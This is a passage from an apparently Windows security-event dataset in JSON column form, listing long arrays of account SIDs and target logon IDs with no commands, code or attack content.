18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"NaN\",\"S-1-5-18\",\"S-1-5-18\",\"NaN\",\"S-1-5-18\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-18\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-18\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-19\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-19\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"NaN\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"NaN\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"NaN\",\"S-1-5-18\",\"S-1-5-18\",\"NaN\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-20\",\"NaN\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"NaN\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-20\",\"S-1-5-20\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"NaN\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\"],\"TargetLogonId\":[\"NaN\",\"0x3e4\",\"0x3e4\",\"0x0\",\"0x0\",\"0x3e5\",\"0x3e4\",\"0x0\",\"0x3e5\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x3e4\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x527d50d\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x527d50d\",\"0x0\",\"0x3e5\",\"0x3e4\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x3e5\",\"0x0\",\"0x0\",\"0x0\",\"NaN\",\"0x0\",\"0x0\",\"NaN\",\"0xab5a5ac\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x3e4\",\"0x0\",\"0x0\",\"0x0\",\"0x3e4\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x3e4\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x3e4\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x3e5\",\"0x0\",\"0x0\",\"0x527d50d\",\"0x527d50d\",\"0x0\",\"0x0\",\"0x0\",\"0x3e4\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x527d50d\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x527d50d\",\"0x3e4\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x